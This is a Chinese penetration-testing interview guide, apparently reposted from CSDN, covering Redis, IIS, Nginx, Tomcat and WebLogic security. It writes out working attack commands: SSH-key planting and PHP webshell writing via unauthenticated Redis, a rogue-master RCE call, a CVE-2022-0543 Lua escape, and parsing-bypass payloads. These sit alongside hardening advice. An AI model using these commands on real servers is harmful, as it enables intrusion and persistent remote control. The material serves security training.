欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 文旅 > 手游 > 2025年常见渗透测试面试题- 常见中间件(题目+回答)

2025年常见渗透测试面试题- 常见中间件(题目+回答)

2025/4/16 14:21:50 来源:https://blog.csdn.net/m0_62828084/article/details/147135585  浏览:    关键词:2025年常见渗透测试面试题- 常见中间件(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 常见中间件

一、Redis未授权访问漏洞攻防全解

1. 漏洞利用三板斧

2. 新型攻击手法

3. 防御体系构建

二、中间件解析漏洞全景剖析

1. 经典解析漏洞矩阵

2. 高级利用技巧

3. 防御方案

三、Java中间件生态全景

1. 主流容器对比

2. 新兴力量

四、Tomcat安全加固十二律

五、Tomcat持久化机制解密

1. 部署目录行为分析

2. 防御实践

六、中间件安全演进趋势

深度防御建议

 常见中间件

Redis未授权访问漏洞如何入侵利用?说说常见的中间件解析漏洞利用方式JAVA有哪些比较常见的中间件容器?tomcat要做哪些安全加固?如果tomcat重启的话,webapps下,你删除的后台会不会又回来?常见的网站服务器中间件容器。

一、Redis未授权访问漏洞攻防全解

1. 漏洞利用三板斧
  1. SSH密钥植入

    bashredis-cli -h 10.2.3.4 flushall echo -e "\n\nssh-rsa AAAAB3NzaC1yc... user@kali" | redis-cli -x set crackit redis-cli config set dir /root/.ssh/ redis-cli config set dbfilename "authorized_keys" redis-cli save 

    通过修改Redis持久化路径,将公钥写入目标服务器认证文件

  2. Webshell写入
    适用于Web目录已知场景:

    bashredis-cli config set dir /var/www/html/ redis-cli set shell "<?phpsystem($_GET['cmd']);?>" redis-cli config set dbfilename "webshell.php" redis-cli save 
  3. 主从复制RCE
    利用模块化攻击框架:

    bashpython3 redis-rogue-server.py --rhost 10.2.3.4 --lhost 192.168.1.5 

    通过恶意主节点发送module load指令加载.so扩展库实现命令执行

2. 新型攻击手法
  • CVE-2022-0543 Lua沙箱逃逸
    利用Debian补丁漏洞执行任意命令:
    luaeval 'local io = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io(); local f = io.popen("id", "r"); local res = f:read("*a"); return res' 0 
3. 防御体系构建
bash# 修改redis.conf 关键配置 requirepass MyS3cr3tP@ss bind 127.0.0.1 ::1 rename-command FLUSHALL "" protected-mode yes 

二、中间件解析漏洞全景剖析

1. 经典解析漏洞矩阵
中间件漏洞类型利用示例影响版本
IIS 6.0目录解析漏洞/test.asp/test.jpgWindows Server 2003
Apache文件名解析特性shell.php.rar所有版本
Nginx%00截断/test.jpg%00.php<0.8.37
PHP-CGI参数解析漏洞/test.jpg -s 192.168.1.5:4444PHP<5.3.12
Tomcat后缀绕过/shell.jsp%207.x/8.x
2. 高级利用技巧
  1. IIS短文件名爆破
    使用工具扫描暴露的8.3格式短文件名:

    bashiis_shortname_scan.py -u http://target/
  2. Nginx配置错误
    错误配置导致源码泄露:

    nginxlocation /static { alias /var/www/; }

    访问/static../app/config.py 获取敏感文件

  3. WebLogic特殊后缀

    httpGET /ws_utc/begin.do?.css HTTP/1.1 
3. 防御方案
  1. IIS加固
    • 禁用ASP解析功能
    • 配置请求过滤规则
  2. Apache修复
    apache<FilesMatch "\.ph(p[3457]?|t|tml)$"> SetHandler application/x-httpd-php </FilesMatch>

三、Java中间件生态全景

1. 主流容器对比
中间件核心特性常见漏洞
TomcatServlet/JSP容器CVE-2017-12615(PUT上传)
WebLogic企业级J2EE应用服务器CVE-2020-14882(未授权RCE)
Jetty轻量级嵌入式容器CVE-2021-28169(路径遍历)
JBoss/WildFlyJava EE开源实现CVE-2017-12149(反序列化)
WebSphereIBM商业级解决方案CVE-2020-4450(IIOP反序列化)
2. 新兴力量
  • Undertow:Red Hat高性能非阻塞服务器
  • Payara:GlassFish社区分支
  • OpenLiberty:IBM轻量化微服务容器

四、Tomcat安全加固十二律

  1. 权限最小化

    bashuseradd -M -s /sbin/nologin tomcat_user chown -R tomcat_user:tomcat_group /opt/tomcat/
  2. 配置强化

    xml<!-- conf/server.xml --> <Connector port="8080" maxHttpHeaderSize="8192" server="Undisclosed" address="127.0.0.1"/>
  3. 管理界面防护

    xml<!-- conf/tomcat-users.xml --> <role rolename="manager-script"/> <user username="deployer" password="Zxcv@1234!" roles="manager-script"/>
  4. 协议升级

    xml<Connector SSLEnabled="true" sslProtocol="TLS" sslEnabledProtocols="TLSv1.2,TLSv1.3" ciphers="TLS_AES_256_GCM_SHA384,..."/>
  5. 入侵检测配置

    bash# 部署Logstash监控日志 input { file { path => "/opt/tomcat/logs/*.log" start_position => "beginning" } }

五、Tomcat持久化机制解密

1. 部署目录行为分析
  • 热部署机制webapps/目录变更触发自动加载
  • 备份恢复场景
    bash# 典型目录结构 webapps/ ├── ROOT ├── app1.war ├── app1/ └── backup/ └── app1_20240411.bak 
2. 防御实践
  1. 彻底删除流程

    bashrm -rf webapps/app1/ # 删除解压目录 rm webapps/app1.war # 删除部署包 sed -i '/app1/d' conf/Catalina/localhost/*.xml # 清理配置文件 
  2. 防止自动恢复

    xml<!-- conf/context.xml --> <Context antiResourceLocking="true" antiJARLocking="true"> <WatchedResource>WEB-INF/web.xml</WatchedResource> </Context>

六、中间件安全演进趋势

  1. 云原生转型
    • 容器化部署:Kubernetes Operator管理中间件
    • Service Mesh:Istio实现安全流量管控
  2. 智能防护体系
    • AI驱动的WAF:动态识别0day攻击
    • RASP技术:实时阻断内存马注入
  3. 合规驱动
    • 等保2.0三级要求
    • GDPR数据安全规范
  4. 供应链安全
    • SBOM(软件物料清单)管理
    • 镜像签名验证
  5. 零信任架构
    • SPIFFE身份认证
    • 持续动态授权

深度防御建议

  1. 建立中间件资产清单

    csvIP地址,中间件类型,版本号,开放端口,负责人 10.1.2.3,Tomcat,9.0.64,8080,张三 10.1.2.4,WebLogic,12.2.1.4,7001,李四 
  2. 自动化漏洞扫描

    bash# 使用Nexpose执行扫描 nexpose -s 10.1.2.0/24 -t middleware_scan 
  3. 红蓝对抗演练

    mermaidgraph LR A[制定攻击方案] --> B[模拟入侵] B --> C[横向移动] C --> D[获取敏感数据] D --> E[编写防御手册]
  4. 安全左移实践

    bash# 在CI/CD流水线集成安全检查 mvn verify -Dincludes=**/*.jsp -Dcheckstyle.config=security-check.xml 

本体系化解决方案覆盖中间件全生命周期安全管理,建议结合ATT&CK框架构建持续监控能力,通过自动化工具链实现安全能力闭环。

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词